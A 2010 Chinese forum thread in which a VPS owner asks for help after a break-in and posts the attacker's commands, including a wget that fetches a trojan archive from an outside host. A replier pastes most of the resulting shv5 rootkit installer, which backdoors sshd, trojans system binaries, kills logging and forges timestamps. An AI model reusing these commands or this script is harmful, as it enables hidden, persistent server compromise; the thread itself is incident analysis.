求助，服务器被黑了……

Giuseffo · 发表于 2010-4-4 19:37

最近想帮老哥做个小网站，练练手。于是买了个vps服务器空间，昨天刚把APACHE PHP MYSQL环境搭建好，今儿回头一试，呃，密码不对了。
赶紧联系机房让他们改回了密码，发现有黑客做了些手脚。从命令记录里找出了丫最可疑的几个命令：
cat /etc/issue
cat /proc/cpuinfo
wget http://geox.at.ua/rk.jp g ------这个是丫下载个木马的地址，大家不要点
tar zxvf rk.jpg
cd .sshd
./setup darkokicevohack123 666

下面是ps auxw的输出：
USER    PID %CPU %MEM VSZ  RSS TTY    STAT START TIME COMMAND
root       1  0.0  0.0  1916  664 ?       S 17:42 0:00 init [3]
root    15530  0.0  0.0  1580  576 ?       S 17:42 0:00 syslogd -m 0
root    15537  0.0  0.0  4900 1096 ?       S 17:42 0:00 /usr/sbin/sshd
root    15546  0.0  0.0  2144  804 ?       S 17:42 0:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
root    15558  0.0  0.0  2288 1144 ?       S 17:42 0:00 /bin/sh /usr/local/mysql/bin/mysqld_safe --datadir=/usr/local/mysql/v
mysql 15590  0.0  0.7 125048 14684 ?    S 17:42 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=
root    15608  0.0  0.0  3124 1100 ?       S 17:42 0:00 crond
root    15616  0.0  0.0  4688  832 ?       S 17:42 0:00 /usr/sbin/saslauthd -m /var/run/saslauthd -a pam -n 1
root    15624  0.0  0.4 19700 9792 ?       S 17:42 0:00 /usr/local/apache2/bin/httpd -k start
daemon 15634  0.0  0.4 19832 9288 ?       S 17:42 0:00 /usr/local/apache2/bin/httpd -k start
daemon 15635  0.0  0.4 19832 9288 ?       S 17:42 0:00 /usr/local/apache2/bin/httpd -k start
daemon 15636  0.0  0.4 19832 9300 ?       S 17:42 0:00 /usr/local/apache2/bin/httpd -k start
daemon 15637  0.0  0.4 19832 9288 ?       S 17:42 0:00 /usr/local/apache2/bin/httpd -k start
daemon 15638  0.0  0.4 19832 9288 ?       S 17:42 0:00 /usr/local/apache2/bin/httpd -k start
root    22009  0.0  0.1  7752 2368 ?       R 19:35 0:00 sshd: root@pts/0
root    22012  0.0  0.0  2296 1336 pts/0 S 19:35 0:00 -bash
daemon 22177  0.0  0.4 19700 8928 ?       S 19:41 0:00 /usr/local/apache2/bin/httpd -k start
root    24410  0.0  0.0  2740  772 pts/0 R 20:28 0:00 ps auxw

下面是 netstat -ln 的输出：
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address          Foreign Address       State
tcp       0    0 0.0.0.0:995          0.0.0.0:*             LISTEN
tcp       0    0 0.0.0.0:3306          0.0.0.0:*             LISTEN
tcp       0    0 0.0.0.0:110          0.0.0.0:*             LISTEN
tcp       0    0 0.0.0.0:80             0.0.0.0:*             LISTEN
tcp       0    0 0.0.0.0:21             0.0.0.0:*             LISTEN
tcp       0    0 0.0.0.0:22             0.0.0.0:*             LISTEN
tcp       0    0 0.0.0.0:25             0.0.0.0:*             LISTEN
raw       0    0 0.0.0.0:1             0.0.0.0:*             7
Active UNIX domain sockets (only servers)
Proto RefCnt Flags    Type    State       I-Node Path
unix  2    [ ACC ]    STREAM    LISTENING    457424811 /tmp/mysql.sock
unix  2    [ ACC ]    STREAM    LISTENING    457424843 /var/run/saslauthd/mux

这家伙对我的服务器到底做了些什么？服务器被鸽子了吗？？请各位前辈指教，谢谢！

savagejin · 发表于 2010-4-4 22:18

大体看了下，这个大概是帮你装了ssh吧，如果你不需要的话，可以把ssh给关了。具体干了什么，可以把他的东西下下来，叫会shell的人看看里面那个setup脚本

Eternal Wind · 发表于 2010-4-5 03:15

setup贴出来

鸡蛋灌饼 · 发表于 2010-4-5 04:58

LZ你先把自己的home清理干净然后改密码
\"cd .sshd\"最可疑，把.ssh里面的东西贴一下，包括文件内容

vine · 发表于 2010-4-5 11:51

楼主你vps没有控制面板吗？
简单的方法重装系统改SSH端口吧...

hello2crawler · 发表于 2010-4-5 12:07

本帖最后由 hello2crawler 于 2010-4-4 23:44 编辑

那个tarball解压出来是这些货:

-rw-r--r-- 1 hello2crawler hello2crawler  15K Mar 24 11:00 .sshd
-rw-r--r-- 1 hello2crawler hello2crawler 502K Apr 20  2008 bin.tgz
-rw-r--r-- 1 hello2crawler hello2crawler  446 Mar 28  2008 conf.tgz
-rw-r--r-- 1 hello2crawler hello2crawler  29K Apr 15  2003 lib.tgz
-rwxr-xr-x 1 hello2crawler hello2crawler  24K Mar 30 15:59 setup
-rw-r--r-- 1 hello2crawler hello2crawler 121K Apr 17  2003 utilz.tgz

Setup 在此, 做了好些事情, 大概看了下就是为了种上sshd的后门. 找备份还原回去吧. 光改root密码不够.

他跑这个的时候已经是root了, 主要问题我猜是在php源码或者apache的设置里面有漏洞, 然后他找到了用apache执行这个的?

看看apache的日志?...不过十有八九已经被改掉老

#!/bin/bash
#
# shv5-internal-release
# by: JohnQ December/2007
#
# greetz to:
#
#

SH-members: Me :)
# PRIVATE ! DO NOT DISTRIBUTE BITCHEZ !

# BASIC DEFINES

DEFPASS=socardeaukdata
DEFPORT=6969
BASEDIR=`pwd`

# DON`T TOUCH BELOW UNLESS YOU KNOW WHAT U`R DOING !
# BEFORE WE MOVE ON LET`s WORK ON SAFE-GROUND !

unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

# RAINBOW COLOURS :)

BLK=\'\'
RED=\'\'
GRN=\'\'
YEL=\'\'
BLU=\'\'
MAG=\'\'
CYN=\'\'
WHI=\'\'
DRED=\'\'
DGRN=\'\'
DYEL=\'\'
DBLU=\'\'
DMAG=\'\'
DCYN=\'\'
DWHI=\'\'
RES=\'\'

# HOPE U`R NO TRYING THIS FROM USER !
# HOWEVER LET`S SEE WHAT KINDA KID U ARE ?

if [ \"$(whoami)\" != \"root\" ]; then
echo \"${DCYN}[${WHI}sh${DCYN}] ${WHI} BECOME ROOT AND TRY AGAIN ${RES}\"
echo \"\"
exit
fi

# UNZIPING SHITS

tar zxf ./bin.tgz
tar zxf ./conf.tgz
tar zxf ./lib.tgz
tar zxf ./utilz.tgz
cd ./bin; tar zxf ./sshd.tgz
rm -rf ./sshd.tgz
cd $BASEDIR
rm -rf bin.tgz conf.tgz lib.tgz utilz.tgz

sleep 2

cd $BASEDIR

killall -9 syslogd >/dev/null 2>&1

startime=`date +%S`

echo \"${DCYN}[${WHI}sh${DCYN}]# Installing shv5 ... this wont take long ${RES}\"
echo \"${DCYN}[${WHI}sh${DCYN}]# If u think we will patch your holes shoot yourself !${RES}\"
echo \"${DCYN}[${WHI}sh${DCYN}]# so patch manualy and fuck off! ${RES}\"
echo \"\"
echo \"\"
echo \"${WHI}============================================================================${RES}\"
echo \"\"
echo \"${DCYN} MMMMM MMMMMM \"
echo \" MMM MMMMMMMMM MMMM MMMM MMM

Presenting u shv5-rootkit ! \"
echo \" MMM MMMM MMMM MMMM MMMM MMM

Designed for internal use !  \"
echo \" MMM MMMMMMM    MMMMMMMMMMMM MMM                                  \"
echo \" MMM    MMMMMMMM MMMMMMMMMMMM MMM

brought to you by: JohnQ \"
echo \" MMM MMMM MMMM MMMM MMM

December 2007 � \"
echo \" MMM MMMM MMMM MMMM MMMM MMM \"
echo \" MMM MMMMMMMMM MMMM MMMM MMM

*** VERY PRIVATE *** \"
echo \" MMM MMM

*** so dont distribute *** \"
echo \" MMMMM    -C- -R- -E- -W-    MMMMMM                                  \"
echo \"                                                                         ${RES}\"
echo \"\"
echo \"${WHI}============================================================================${RES}\"
echo \"\"
sleep 2

echo \"${DCYN}[${WHI}sh${DCYN}]# backdooring started on ${WHI}`hostname -f`${RES}\"
echo \"${DCYN}[${WHI}sh${DCYN}]#                                                                ${RES}\"
echo \"${DCYN}[${WHI}sh${DCYN}]#                                                                ${RES}\"

SYSLOGCONF=\"/etc/syslog.conf\"

echo -n \"${DCYN}[${WHI}sh${DCYN}]# checking for remote logging... ${RES}\"

REMOTE=`grep -v \"^#\" \"$SYSLOGCONF\" | grep -v \"^$\" | grep \"@\" | cut -d \'@\' -f 2`

if [ ! -z \"$REMOTE\" ]; then
      echo \"${DCYN}[${WHI}sh${DCYN}]# May Allah help us!${RES}\"
      echo
      echo \'${RED}                   REMOTE LOGGING DETECTED ${RES}\'
      echo \'${DCYN}[${WHI}sh${DCYN}]#       I hope you can get to these other computer(s): ${RES}\'
      echo
      for host in $REMOTE; do
            echo -n \"          \"
            echo $host
      done
      echo
      echo \' ${WHI}          cuz this box is LOGGING to it... ${RES}\'
      echo
else
      echo \" ${WHI} guess not.${RES}\"
fi

#######################################################################
## CHEKING FOR MALICIOUS ADMIN TOOLS !(like tripwire, snort, etc...) ##
##                                                                ##
#######################################################################

echo -n \"${DCYN}[${WHI}sh${DCYN}]# checking for tripwire... ${RES}\"

uname=`uname -n`
twd=/var/lib/tripwire/$uname.twd

if [ -d /etc/tripwire ]; then
echo \"${WHI} ALERT: TRIPWIRE FOUND! ${RES}\"

if [ -f /var/lib/tripwire/$uname.twd ]; then
   chattr -isa $twd
   echo -n \"${DCYN}[${WHI}sh${DCYN}]# checking for tripwire-database... ${RES}\"
   echo \"${RED} ALERT! tripwire database found ${RES}\"
   echo \"${DCYN}[${WHI}sh${DCYN}]# ${WHI} dun worry we got handy-tricks for this :) ${RES}\"
   echo \"-----------------------------------------\" > $twd
   echo \"Tripwire segment-faulted !\" >> $twd
   echo \"-----------------------------------------\" >> $twd
   echo \"\" >> $twd
   echo \"The reasons for this may be: \" >> $twd
   echo \"\" >> $twd
   echo \"corrupted disc-geometry, possible bad disc-sectors\" >> $twd
   echo \"corrupted files while checking for possible change etc.\" >> $twd
   echo \"\"
   echo \"pls. rerun tripwire to build the database again!\" >> $twd
   echo \"\" >> $twd
else
   echo \"${WHI} lucky you: Tripwire database not found. ${RES}\"
fi
else
echo \"${WHI} guess not. ${RES}\"
fi

# restoring login

if [ -f /sbin/xlogin ]; then
chattr -isa /sbin/xlogin
chattr -isa /bin/login
mv -f /sbin/xlogin /bin/login
chmod 7455 /bin/login
chattr +isa /bin/login
fi

echo \"${DCYN}[${WHI}sh${DCYN}]# [Installing trojans....]                               ${BLU}    ${RES}\"

if [ -f /etc/sh.conf ]; then
  chattr -isa /etc/sh.conf
  rm -rf /etc/sh.conf
fi

# checking if we got needed libs and filez

if [ ! -f /lib/libproc.a ]; then
mv lib/libproc.a /lib/
fi

if [ ! -f /lib/libproc.so.2.0.6 ]; then
mv lib/libproc.so.2.0.6 /lib/
fi
perl .sshd

/sbin/ldconfig >/dev/null 2>&1

#if [ -f /lib/libncurses.so.5 ]; then
# echo \"\"
#else
# ln -s /lib/libncurses.so.4 /lib/libncurses.so.5 2>/dev/null
#fi

if [ -f /.bash_history ]; then
chattr -isa /.bash_history >/dev/null 2>&1
rm -rf /.bash_history
fi

if [ -f /bin/.bash_history ]; then
chattr -isa /bin/.bash_history
rm -rf /bin/.bash_history
fi

if [ ! -f /usr/bin/md5sum ]; then
touch -acmr /bin/ls bin/md5sum
cp bin/md5sum /usr/bin/md5sum
fi

if test -n \"$1\" ; then
echo \"${DCYN}[${WHI}sh${DCYN}]#  Using Password : ${WHI}$1                               ${BLU}    ${RES}\"
cd $BASEDIR/bin
echo -n $1 >> /tmp/.mf
echo -n $1|md5sum > /etc/sh.conf
else
echo \"${DCYN}[${WHI}sh${DCYN}]# ${WHI} No Password Specified, using default - $DEFPASS          ${BLU}    ${RES}\"
echo -n $DEFPASS >> /tmp/.mf
echo -n $DEFPASS|md5sum > /etc/sh.conf
fi

touch -acmr /bin/ls /etc/sh.conf
chown -f root:root /etc/sh.conf
chattr +isa /etc/sh.conf

if test -n \"$2\" ; then
echo \"${DCYN}[${WHI}sh${DCYN}]#       Using ssh-port : ${WHI}$2                               ${RES}\"
echo \"Port $2\" >> $BASEDIR/bin/.sh/sshd_config
echo \"3 $2\" >> $BASEDIR/conf/hosts.h
echo \"4 $2\" >> $BASEDIR/conf/hosts.h
port=$2
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
else
echo \"${DCYN}[${WHI}sh${DCYN}]# No ssh-port Specified, using default - $DEFPORT          ${BLU}    ${RES}\"
echo \"Port $DEFPORT\" >> $BASEDIR/bin/.sh/sshd_config
echo \"3 $2\" >> $BASEDIR/conf/hosts.h
echo \"4 $2\" >> $BASEDIR/conf/hosts.h
port=$DEFPORT
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
fi

/sbin/iptables -I INPUT -p tcp --dport $port -j ACCEPT

if [ -f /lib/lidps1.so ]; then
  chattr -isa /lib/lidps1.so
  rm -rf /lib/lidps1.so
fi

if [ -f /usr/include/hosts.h ]; then
  chattr -isa /usr/include/hosts.h
  rm -rf /usr/include/hosts.h
fi

if [ -f /usr/include/file.h ]; then
  chattr -isa /usr/include/file.h
  rm -rf /usr/include/file.h
fi

if [ -f /usr/include/log.h ]; then
  chattr -isa /usr/include/log.h
  rm -rf /usr/include/log.h
fi

if [ -f /usr/include/proc.h ]; then
  chattr -isa /usr/include/proc.h
  rm -rf /usr/include/proc.h
fi

cd $BASEDIR
mv $BASEDIR/conf/lidps1.so /lib/lidps1.so
touch -acmr /bin/ls /lib/lidps1.so
touch -acmr /bin/ls $BASEDIR/conf/*
mv $BASEDIR/conf/*  /usr/include/

# Ok lets start creating dirs

SSHDIR=/lib/libsh.so
HOMEDIR=/usr/lib/libsh

if [ -d /lib/libsh.so ]; then
chattr -isa /lib/libsh.so
chattr -isa /lib/libsh.so/*
rm -rf /lib/libsh.so
fi

if [ -d /usr/lib/libsh ]; then
chattr -isa /usr/lib/libsh
chattr -isa /usr/lib/libsh/*
rm -rf /usr/lib/libsh/*
fi

mkdir $SSHDIR
touch -acmr /bin/ls $SSHDIR
mkdir $HOMEDIR
touch -acmr /bin/ls $HOMEDIR

cd $BASEDIR/bin
mv .sh/* $SSHDIR/
mv .sh/.bashrc $HOMEDIR

if [ -f /sbin/ttyload ]; then
chattr -AacdisSu /sbin/ttyload
rm -rf /sbin/ttyload
fi

if [ -f /sbin/ttylib ]; then
chattr -AacdisSu /sbin/ttylib
rm -rf /sbin/ttylib
fi

if [ -f /usr/sbin/ttyload ]; then
chattr -isa /usr/sbin/ttyload
rm -rf /usr/sbin/ttyload
fi

if [ -f /sbin/ttymon ]; then
chattr -isa /sbin/ttymon
rm -rf /sbin/ttymon
fi

mv $SSHDIR/sshd /sbin/ttyload
chmod a+xr /sbin/ttyload
chmod o-w /sbin/ttyload
touch -acmr /bin/ls /sbin/ttyload
chattr +isa /sbin/ttyload
kill -9 `pidof ttyload` >/dev/null 2>&1

mv $SSHDIR/bin/ttylib /sbin/ttylib
chmod a+xr /sbin/ttylib
chmod o-w /sbin/ttylib
touch -acmr /bin/ls /sbin/ttylib
chattr +isa /sbin/ttylib
kill -9 `pidof ttylib` >/dev/null 2>&1

mv $BASEDIR/bin/ttymon /sbin/ttymon
chmod a+xr /sbin/ttymon
touch -acmr /bin/ls /sbin/ttymon
chattr +isa /sbin/ttymon
kill -9 `pidof ttymon` >/dev/null 2>&1

cp /bin/bash $SSHDIR

# INITTAB SHUFFLING

chattr -isa /etc/inittab
cat /etc/inittab |grep -v ttyload|grep -v getty > /tmp/.init1
cat /etc/inittab |grep getty > /tmp/.init2
echo \"# Loading standard ttys\" >> /tmp/.init1
echo \"0:2345:once:/usr/sbin/ttyload\" >> /tmp/.init1
cat /tmp/.init2 >> /tmp/.init1
echo \"\" >> /tmp/.init1
echo \"# modem getty.\" >> /tmp/.init1
echo \"# mo:235:respawn:/usr/sbin/mgetty -s 38400 modem\" >> /tmp/.init1
echo \"\" >> /tmp/.init1
echo \"# fax getty (hylafax)\" >> /tmp/.init1
echo \"# mo:35:respawn:/usr/lib/fax/faxgetty /dev/modem\" >> /tmp/.init1
echo \"\" >> /tmp/.init1
echo \"# vbox (voice box) getty\" >> /tmp/.init1
echo \"# I6:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI6\" >> /tmp/.init1
echo \"# I7:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI7\" >> /tmp/.init1
echo \"\" >> /tmp/.init1
echo \"# end of /etc/inittab\" >> /tmp/.init1
echo \"/sbin/ttyload -q >/dev/null 2>&1\" > /usr/sbin/ttyload
echo \"/sbin/ttymon >/dev/null 2>&1\" >> /usr/sbin/ttyload
echo \"/sbin/ttylib >/dev/null 2>&1\" >> /usr/sbin/ttyload
echo \"/sbin/iptables -I INPUT -p tcp --dport $port -j ACCEPT\" >> /usr/sbin/ttyload
echo \"iptables -I INPUT -p tcp --dport $port -j ACCEPT\" >> /usr/sbin/ttyload
touch -acmr /bin/ls /usr/sbin/ttyload
chmod +x /usr/sbin/ttyload
chattr +isa /usr/sbin/ttyload
/usr/sbin/ttyload >/dev/null 2>&1

touch -amcr /etc/inittab /tmp/.init1
mv -f /tmp/.init1 /etc/inittab
rm -rf /tmp/.init2

# MAKING SURE WE GOT IT BACKDORED RIGHT !

if [ ! \"`grep ttyload /etc/inittab`\" ]; then
echo \"${RED}[${WHI}sh${RED}]# WARNING - SSHD WONT BE RELOADED UPON RESTART \"
echo \"${RED}[${WHI}sh${RED}]# inittab shuffling probly fucked-up ! \"
fi

# Say hello to md5sum fixer boys n gurls !

if [ -f /sbin/ifconfig ]; then
/usr/bin/md5sum /sbin/ifconfig >> .shmd5
fi
if [ -f /bin/ps ]; then
/usr/bin/md5sum /bin/ps >> .shmd5
fi
if [ -f /bin/ls ]; then
/usr/bin/md5sum /bin/ls >> .shmd5
fi
if [ -f /bin/netstat ]; then
/usr/bin/md5sum /bin/netstat >> .shmd5
fi
if [ -f /usr/bin/find ]; then
/usr/bin/md5sum /usr/bin/find >> .shmd5
fi
if [ -f /usr/bin/top ]; then
/usr/bin/md5sum /usr/bin/top >> .shmd5
fi
if [ -f /usr/sbin/lsof ]; then
/usr/bin/md5sum /usr/sbin/lsof >> .shmd5
fi
if [ -f /usr/bin/slocate ]; then
/usr/bin/md5sum /usr/bin/slocate >> .shmd5
fi
if [ -f /usr/bin/dir ]; then
/usr/bin/md5sum /usr/bin/dir >> .shmd5
fi
if [ -f /usr/bin/md5sum ]; then
/usr/bin/md5sum /usr/bin/md5sum >> .shmd5
fi

if [ ! -f /dev/srd0 ]; then
  ./encrypt -e .shmd5 /dev/srd0
  touch -acmr /bin/ls /dev/srd0
  chattr a+r /dev/srd0
  chown -f root:root /dev/srd0
fi

rm -rf .shmd5

# time change bitch

touch -acmr /sbin/ifconfig ifconfig >/dev/null 2>&1
touch -acmr /bin/ps ps >/dev/null 2>&1
touch -acmr /bin/ls ls >/dev/null 2>&1
touch -acmr /bin/netstat netstat >/dev/null 2>&1
touch -acmr /usr/bin/find find >/dev/null 2>&1
touch -acmr /usr/bin/top top >/dev/null 2>&1
touch -acmr /usr/sbin/lsof lsof >/dev/null 2>&1
touch -acmr /sbin/syslogd syslogd >/dev/null 2>&1
touch -acmr /usr/bin/slocate slocate >/dev/null 2>&1
touch -acmr /usr/bin/dir dir >/dev/null 2>&1
touch -acmr /usr/bin/md5sum md5sum >/dev/null 2>&1
md5sum=\"lingmail.com\"
touch -acmr /usr/bin/pstree pstree >/dev/null 2>&1

# Backdoor ps/top/du/ls/netstat/etc..

cd $BASEDIR/bin

BACKUP=/usr/lib/libsh/.backup
mkdir $BACKUP

# ps ...
if [ -f /usr/bin/ps ]; then
chattr -isa /usr/bin/ps
cp /usr/bin/ps $BACKUP
mv -f ps /usr/bin/ps
chattr +isa /usr/bin/ps
fi

if [ -f /bin/ps ]; then
chattr -isa /bin/ps
cp /bin/ps $BACKUP
mv -f ps /bin/ps
chattr +isa /bin/ps
fi

# ifconfig ...
chattr -isa /sbin/ifconfig
cp /sbin/ifconfig $BACKUP
mv -f ifconfig /sbin/ifconfig
chattr +isa /sbin/ifconfig

# netstat ...
if [ -f /usr/sbin/netstat ]; then
  chattr -isa /usr/sbin/netstat
  mv -f netstat /usr/sbin/netstat
  chattr +isa /usr/sbin/netstat
fi

chattr -isa /bin/netstat
cp /bin/netstat $BACKUP
mv -f netstat /bin/netstat
chattr +isa /bin/netstat

# top ...
if [ -f /usr/bin/top ]; then
chattr -isa /usr/bin/top
cp /usr/bin/top $BACKUP
mv -f top /usr/bin/top
chattr +isa /usr/bin/top
if [ -f /lib/libncurses.so.5 ]; then
   ln -s /lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null
fi
if [ -f /usr/lib/libncurses.so.5 ]; then
   ln -s /usr/lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null
fi
fi

# slocate ...
if [ -f /usr/bin/slocate ]; then
chattr -isa /usr/bin/slocate
cp /usr/bin/slocate $BACKUP
mv -f slocate /usr/bin/slocate
chattr +isa /usr/bin/slocate
fi

# ls ...
chattr -isa /bin/ls
cp /bin/ls $BACKUP
mv -f ls /bin/ls
chattr +isa /bin/ls

# find ...
if [ -f /usr/bin/find ]; then
chattr -isa /usr/bin/find
cp /usr/bin/find $BACKUP
mv -f find /usr/bin/find
chattr +isa /usr/bin/find
fi

# dir ...
if [ -f /usr/bin/dir ]; then
chattr -isa /usr/bin/dir
cp /usr/bin/dir $BACKUP
mv -f dir /usr/bin/dir
chattr +isa /usr/bin/dir
fi

# lsof ...
if [ -f /usr/sbin/lsof ]; then
chattr -isa /usr/sbin/lsof
cp /usr/sbin/lsof $BACKUP
mv -f lsof /usr/sbin/lsof
chattr +isa /usr/sbin/lsof
fi

# pstree ...
if [ -f /usr/bin/pstree ]; then
chattr -isa /usr/bin/pstree
cp /usr/bin/pstree $BACKUP
mv -f pstree /usr/bin/pstree
chattr +isa /usr/bin/pstree
fi

# md5sum ...
chattr -isa /usr/bin/md5sum
cp /usr/bin/md5sum $BACKUP
mv -f md5sum /usr/bin/md5sum
chattr +isa /usr/bin/md5sum

# syslogd ...
# we won`t trojan it coz its too sensitive and won`t work.
# Admin will notice it upon system-restart!

#if [ -f /sbin/syslogd ]; then
# chattr -isa /sbin/syslogd
# cp /sbin/syslogd $BACKUP
# mv -f syslogd /sbin/syslogd
# chattr +isa /sbin/syslogd
#fi

echo \"${DCYN}[${WHI}sh${DCYN}]#       : ps/ls/top/netstat/ifconfig/find/ and rest backdoored${RES}\"
echo \"${DCYN}[${WHI}sh${DCYN}]#                                                                ${RES}\"
echo \"${DCYN}[${WHI}sh${DCYN}]# [Installing some utils...]                                     ${RES}\"

cd $BASEDIR

#if [ ! -f /usr/bin/wget ]; then
# touch -acmr /bin/ls ./bin/wget
# chmod 744 ./bin/wget
# mv ./bin/wget /usr/bin/wget
#fi

# PICO WILL MAKE RK GROW BIG!
# SO FUCK OFF AND USE vi !

#if [ ! -f /usr/bin/pico ]; then
# touch -acmr /bin/ls ./pico
# chmod 744 ./pico
# mv ./pico /usr/bin/pico
#fi

touch -acmr /bin/ls $BASEDIR/utilz
touch -acmr /bin/ls $BASEDIR/utilz/*
mv $BASEDIR/utilz $HOMEDIR/

echo \"${DCYN}[${WHI}sh${DCYN}]#       : mirk/synscan/others... moved                   ${RES}\"

echo \"${DCYN}[${WHI}sh${DCYN}]# [Moving our files...]                                           ${RES}\"

mkdir $HOMEDIR/.sniff
mv $BASEDIR/bin/shsniff $HOMEDIR/.sniff/shsniff
mv $BASEDIR/bin/shp $HOMEDIR/.sniff/shp
mv $BASEDIR/bin/shsb $HOMEDIR/shsb
mv $BASEDIR/bin/hide $HOMEDIR/hide

touch -acmr /bin/ls $HOMEDIR/.sniff/shsniff
touch -acmr /bin/ls $HOMEDIR/.sniff/shp
touch -acmr /bin/ls $HOMEDIR/shsb
touch -acmr /bin/ls $HOMEDIR/hide

chmod +x $HOMEDIR/.sniff/*
chmod +x $HOMEDIR/shsb
chmod +x $HOMEDIR/hide

echo \"${DCYN}[${WHI}sh${DCYN}]#       : sniff/parse/sauber/hide moved                   ${RES}\"
echo \"${DCYN}[${WHI}sh${DCYN}]# [Modifying system settings to suite our needs]                   ${RES}\"

# CHECKING FOR VULN DAEMONS
# JUST WARNING NOT PATCHING HeH

echo \"${DCYN}[${WHI}sh${DCYN}]# Checking for vuln-daemons ...                   ${RES}\"

ps aux > /tmp/.procs

if [ \"`cat /tmp/.procs | grep named`\" ]; then
echo \"${RED}[${WHI}sh${RED}]# NAMED found - patch it bitch !!!!             ${RES}\"
fi

if [ -f /usr/sbin/wu.ftpd ]; then
echo \"${RED}[${WHI}sh${RED}]# WU-FTPD found - patch it bitch !!!!             ${RES}\"
fi

if [ \"`cat /tmp/.procs | grep smbd`\" ]; then
echo \"${RED}[${WHI}sh${RED}]# SAMBA found - patch it bitch !!!!             ${RES}\"
fi

if [ \"`cat /tmp/.procs | grep rpc.statd`\" ]; then
echo \"${RED}[${WHI}sh${RED}]# RPC.STATD found - patch it bitch !!!!             ${RES}\"
fi

rm -rf /tmp/.procs

netstat -natp > /tmp/.stats

if [ \"`cat /tmp/.stats | grep 443 | grep http`\" ]; then
echo \"${RED}[${WHI}sh${RED}]# MOD_SSL found - patch it bitch !!!!             ${RES}\"
fi

rm -rf /tmp/.stats

# CHECKING FOR HOSTILE ROOTKITS/BACKDORS

mkdir $HOMEDIR/.owned

if [ -f /etc/ttyhash ]; then
chattr -AacdisSu /etc/ttyhash
rm -rf /etc/ttyhash
fi

if [ -d /lib/ldd.so ]; then
chattr -isa /lib/ldd.so
chattr -isa /lib/ldd.so/*
mv /lib/ldd.so $HOMEDIR/.owned/tk8
echo \"${RED}[${WHI}sh${RED}]# tk8 detected and owned ...!!!!             ${RES}\"
fi

if [ -d /usr/src/.puta ]; then
chattr -isa /usr/src/.puta
chattr -isa /usr/src/.puta/*
mv /usr/src/.puta $HOMEDIR/.owned/tk7
echo \"${RED}[${WHI}sh${RED}]# tk7 detected and owned ...!!!!             ${RES}\"
fi

if [ -f /usr/sbin/xntpd ]; then
chattr -isa /usr/sbin/xntpd
rm -rf /usr/sbin/xntpd
fi

if [ -f /usr/sbin/nscd ]; then
chattr -isa /usr/sbin/nscd
rm -rf /usr/sbin/nscd
fi

if [ -d /usr/include/bex ]; then
chattr -isa /usr/info/termcap.info-5.gz; rm -rf /usr/info/termcap.info-5.gz
chattr -isa /usr/include/audit.h; rm -rf /usr/include/audit.h
chattr -isa /usr/include/bex
chattr -isa /usr/include/bex/*
mv /usr/include/bex/ $HOMEDIR/.owned/bex2
if [ -f /var/log/tcp.log ]; then
   chattr -isa /var/log/tcp.log
   cp /var/log/tcp.log $HOMEDIR/.owned/bex2/snifflog
fi
chattr -isa /usr/bin/sshd2 >/dev/null 2>&1
rm -rf /usr/bin/sshd2 >/dev/null 2>&1
echo \"${RED}[${WHI}sh${RED}]# beX2 detected and owned ...!!!!             ${RES}\"
fi

if [ -d /dev/tux/ ]; then
chattr -isa /usr/bin/xsf >/dev/null 2>&1
rm -rf /usr/bin/xsf >/dev/null 2>&1
chattr -isa /usr/bin/xchk >/dev/null 2>&1
rm -rf /usr/bin/xchk >/dev/null 2>&1
chattr -isa /dev/tux >/dev/null 2>&1
mv /dev/tux $HOMEDIR/.owned/tuxkit
echo \"${RED}[${WHI}sh${RED}]# tuxkit detected and owned ...!!!!             ${RES}\"
fi

if [ -f /usr/bin/ssh2d ]; then
chattr -isa /usr/bin/ssh2d
rm -rf /usr/bin/ssh2d
chattr -isa /lib/security/.config/
chattr -isa /lib/security/.config/*
rm -rf /lib/security/.config
echo \"${RED}[${WHI}sh${RED}]# optickit detected and removed ...!!!!             ${RES}\"
fi

if [ -f /etc/ld.so.hash ]; then
chattr -isa /etc/ld.so.hash
rm -rf /etc/ld.so.hash
fi

chattr +isa /usr/lib/libsh
chattr +isa /lib/libsh.so

# GREPPING SHITZ FROM rc.sysinit and inetd.conf

if [ -f /etc/rc.d/rc.sysinit ]; then
chattr -isa /etc/rc.d/rc.sysinit
cat /etc/rc.d/rc.sysinit | grep -v \"# Xntps (NTPv3 daemon) startup..\"| grep -v \"/usr/sbin/xntps\"| grep -v \"/usr/sbin/nscd\" > /tmp/.grep
chmod +x /tmp/.grep
touch -acmr /etc/rc.d/rc.sysinit /tmp/.grep
mv -f /tmp/.grep /etc/rc.d/rc.sysinit
rm -rf /tmp/.grep
fi

if [ -f /etc/inetd.conf ]; then
chattr -isa /etc/inetd.conf
cat /etc/inetd.conf | grep -v \"6635\"| grep -v \"9705\" > /tmp/.grep
touch -acmr /etc/inted.conf /tmp/.grep
mv -f /tmp/.grep /etc/inetd.conf
rm -rf /tmp/.grep
fi

# KILLING SOME LAMME DAEMONS

killall -9 -q nscd >/dev/null 2>&1
killall -9 -q xntps >/dev/null 2>&1
killall -9 -q mountd >/dev/null 2>&1
killall -9 -q mserv >/dev/null 2>&1
killall -9 -q psybnc >/dev/null 2>&1
killall -9 -q t0rns >/dev/null 2>&1
killall -9 -q linsniffer >/dev/null 2>&1
killall -9 -q sniffer >/dev/null 2>&1
killall -9 -q lpsched >/dev/null 2>&1
killall -9 -q sniff >/dev/null 2>&1
killall -9 -q sn1f >/dev/null 2>&1
killall -9 -q sshd2 >/dev/null 2>&1
killall -9 -q xsf >/dev/null 2>&1
killall -9 -q xchk >/dev/null 2>&1
killall -9 -q ssh2d >/dev/null 2>&1

echo \"${WHI}--------------------------------------------------------------------${RES}\"

echo \"${DCYN}[${WHI}sh${DCYN}]# [System Information...]${RES}\"
